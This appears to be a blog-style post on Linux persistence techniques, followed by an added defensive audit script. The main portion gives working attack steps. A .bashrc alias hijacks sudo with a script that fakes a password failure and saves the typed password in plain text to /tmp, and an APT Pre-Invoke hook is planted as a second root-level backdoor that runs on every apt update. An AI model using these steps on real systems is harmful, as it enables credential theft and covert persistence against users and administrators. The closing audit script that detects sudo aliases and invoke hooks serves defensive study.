A couple of persistence methods on Linux. This time we're picking on APT and bashrc :)
First let's play with bashrc. It's in the user's home directory, and is called .bashrc.
First we make the script executable and point a sudo alias at it in .bashrc.
# make ~/.hidden/fakesudo (the script is written below) executable
$ chmod u+x ~/.hidden/fakesudo
# add the alias to .bashrc so "sudo" resolves to the script instead of /usr/bin/sudo
$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
Now we write the fakesudo script:
# prompt exactly the way sudo does, reading the password without echo
read -sp "[sudo] password for $USER: " sudopass
echo ""
# short pause so the fake failure looks like a real authentication check
sleep 2
echo "Sorry, try again."
# the typed password is appended in the clear to a file in /tmp
echo $sudopass >> /tmp/pass.txt
# hand off to the real sudo, which prompts again as if the first attempt simply failed
/usr/bin/sudo $@
A candy snowman for the reader who can figure out what happens here ;)
Now, on to something else. Let's play with APT for a while. In /etc/apt/apt.conf.d make a file called 00aptconf, and throw this line in it:
APT::Update::Pre-Invoke {"very long command goes here..."};
Now, every time someone runs apt update, it will trigger the command or script in that line, so it could serve as a second backdoor to leave behind if the primary gets removed :)
Of course it's pretty easy to find, IF someone were to read through all their APT config files. Do you do that very often?
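As an added defender-side example (not part of the original post), here is a small audit script that checks both spots from this post: rc files that shadow sudo with an alias or function, and Pre-Invoke/Post-Invoke hooks under an apt.conf.d directory. The sample files it inspects are constructed inside the script; the paths and the placeholder hook command are assumptions, not values from any real system.

```bash
#!/bin/bash
# Audit for the two persistence spots discussed above. Sample files are
# constructed below so the script runs offline; point the functions at
# ~/.bashrc (and ~/.bash_aliases, ~/.profile) and /etc/apt/apt.conf.d for real.

# Report alias or function definitions that shadow "sudo" in one rc file.
# Returns 0 if the file is clean, 1 if something was flagged, 2 if unreadable.
audit_rc_file() {
    local rc="$1" hits
    [ -r "$rc" ] || { printf '[rc] cannot read %s\n' "$rc" >&2; return 2; }
    hits=$(grep -nE '^[[:space:]]*(alias[[:space:]]+sudo=|sudo[[:space:]]*\(\)|function[[:space:]]+sudo([^[:alnum:]_]|$))' "$rc" || true)
    [ -z "$hits" ] && return 0
    printf '[rc] sudo is shadowed in %s:\n%s\n' "$rc" "$hits"
    return 1
}

# List every Pre-Invoke / Post-Invoke hook under an apt.conf.d directory.
# These run with apt's (root) privileges on every "apt update", so each one
# should be traceable to a package or a deliberate admin change.
# Returns 0 if no hooks exist, 1 if any were listed.
audit_apt_hooks() {
    local dir="$1" hits
    hits=$(grep -rnE '(Pre|Post)-Invoke' "$dir" 2>/dev/null || true)
    [ -z "$hits" ] && return 0
    printf '[apt] invoke hooks under %s (review each one):\n%s\n' "$dir" "$hits"
    return 1
}

# Constructed sample input (not real system files), written to a temp dir.
setup_samples() {
    SAMPLE_DIR=$(mktemp -d)
    printf 'export EDITOR=vim\nalias sudo=~/.hidden/fakesudo\n' > "$SAMPLE_DIR/bashrc_planted"
    printf 'export EDITOR=vim\nalias ll="ls -la"\n' > "$SAMPLE_DIR/bashrc_clean"
    mkdir -p "$SAMPLE_DIR/apt.conf.d"
    # same shape as the post's 00aptconf; the command is a placeholder
    printf 'APT::Update::Pre-Invoke {"/placeholder/command";};\n' > "$SAMPLE_DIR/apt.conf.d/00aptconf"
    printf 'APT::Install-Recommends "false";\n' > "$SAMPLE_DIR/apt.conf.d/99norecommends"
}

# Stand-alone run over the constructed samples.
setup_samples
audit_rc_file "$SAMPLE_DIR/bashrc_planted" || true
audit_rc_file "$SAMPLE_DIR/bashrc_clean" && printf '[rc] %s: clean\n' "$SAMPLE_DIR/bashrc_clean"
audit_apt_hooks "$SAMPLE_DIR/apt.conf.d" || true
```

In a live shell, `type sudo` also shows immediately whether sudo resolves to an alias or function rather than to /usr/bin/sudo.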
Have fun ;)